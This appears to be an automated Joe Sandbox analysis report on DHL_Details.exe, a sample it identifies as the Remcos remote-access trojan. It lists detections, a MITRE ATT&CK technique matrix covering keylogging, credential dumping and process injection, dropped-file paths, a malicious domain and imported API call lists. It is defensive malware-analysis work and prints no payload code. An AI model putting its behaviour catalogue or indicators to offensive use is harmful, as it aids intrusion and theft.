
Analysis Report DHL_Details.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 224538
Start date: 22.04.2020
Start time: 18:42:25
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 27s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DHL_Details.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.evad.winEXE@35/10@2/2
EGA Information:
  • Successful, ratio: 33.3%
HDC Information:
  • Successful, ratio: 59.1% (good quality ratio 45.5%)
  • Quality average: 59.6%
  • Quality standard deviation: 40.4%
HCA Information:
  • Successful, ratio: 67%
  • Number of executed functions: 21
  • Number of non-executed functions: 264
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 216.58.215.238, 172.217.168.46, 2.18.68.82, 104.103.72.58, 104.103.72.113
  • Excluded domains from analysis (whitelisted): docs.google.com, au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, audownload.windowsupdate.nsatc.net, drive.google.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Execution Graph export aborted for target DHL_Details.exe, PID 5472 because there are no executed function
  • Execution Graph export aborted for target Xgkuees.exe, PID 4732 because there are no executed function
  • Execution Graph export aborted for target ieinstal.exe, PID 5180 because there are no executed function
  • Execution Graph export aborted for target mshta.exe, PID 5488 because there are no executed function
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | | false | Remcos | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting1 | Registry Run Keys / Startup Folder1 | Access Token Manipulation1 | Software Packing11 | Credential Dumping2 | System Time Discovery1 | Remote File Copy21 | Data from Local System1 | Data Encrypted1 | Uncommonly Used Port1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Replication Through Removable Media | Execution through API2 | Scheduled Task1 | Process Injection522 | Deobfuscate/Decode Files or Information1 | Credentials in Files3 | Account Discovery1 | Remote Services | Screen Capture1 | Exfiltration Over Other Network Medium | Remote File Copy21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Defacement1
External Remote Services | Graphical User Interface11 | Modify Existing Service1 | Scheduled Task1 | Scripting1 | Input Capture221 | Security Software Discovery1 | Windows Remote Management | Email Collection11 | Automated Exfiltration | Standard Cryptographic Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Command-Line Interface11 | Application Shimming1 | Application Shimming1 | Obfuscated Files or Information2 | Credentials in Registry1 | System Service Discovery1 | Logon Scripts | Input Capture221 | Data Encrypted | Remote Access Tools1 | SIM Card Swap | Premium SMS Toll Fraud
Exploit Public-Facing Application | Service Execution2 | New Service1 | New Service1 | Masquerading1 | Account Manipulation | File and Directory Discovery3 | Shared Webroot | Clipboard Data2 | Scheduled Transfer | Standard Non-Application Layer Protocol1 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Spearphishing Link | Scheduled Task1 | Modify Existing Service | New Service | Modify Registry1 | Brute Force | System Information Discovery46 | Third-party Software | Screen Capture | Data Transfer Size Limits | Standard Application Layer Protocol2 | Jamming or Denial of Service | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Virtualization/Sandbox Evasion1 | Two-Factor Authentication Interception | Virtualization/Sandbox Evasion1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Access Token Manipulation1 | Bash History | Process Discovery3 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection522 | Input Prompt | Application Window Discovery1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Scripting | Keychain | System Owner/User Discovery1 | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | Data Encrypted for Impact
Hardware Additions | Execution through API | File System Permissions Weakness | Valid Accounts | Indicator Removal from Tools | Private Keys | Remote System Discovery1 | Replication Through Removable Media | Video Capture | Standard Application Layer Protocol | Communication Through Removable Media | Disk Structure Wipe

Signature Overview



AV Detection:

Multi AV Scanner detection for domain / URL
Source: u863495.awsmppl.com | Virustotal: Detection: 9%
Multi AV Scanner detection for submitted file
Source: DHL_Details.exe | Virustotal: Detection: 11%
Yara detected Remcos RAT
Source: Yara match | File source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 4764, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 5284, type: MEMORY
Source: Yara match | File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\Xgku\Xgkuees.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: DHL_Details.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 16.2.ieinstal.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 0.2.DHL_Details.exe.10530000.7.unpack | Avira: Label: TR/Crypt.Morphine.Gen
Source: 15.2.Xgkuees.exe.10530000.5.unpack | Avira: Label: TR/Crypt.Morphine.Gen
Source: 12.2.ieinstal.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 12.2.ieinstal.exe.10530000.2.unpack | Avira: Label: TR/Crypt.Morphine.Gen
Source: 11.2.Xgkuees.exe.10530000.5.unpack | Avira: Label: TR/Crypt.Morphine.Gen
Source: 16.2.ieinstal.exe.10530000.2.unpack | Avira: Label: TR/Crypt.Morphine.Gen

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Xgku\Xgkuest.exe | Code function: 10_2_00404268 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,10_2_00404268
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@
std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t12_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QB
EPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_t
raits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_004126D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$ba
sic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00403315
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10536462 FindFirstFileW,FindNextFileW,FindClose,12_2_10536462
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10544061 FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,12_2_10544061
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10534CA3 FindFirstFileW,12_2_10534CA3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10538D9D getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,12_2_10538D9D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10541E6E FindFirstFileW,12_2_10541E6E
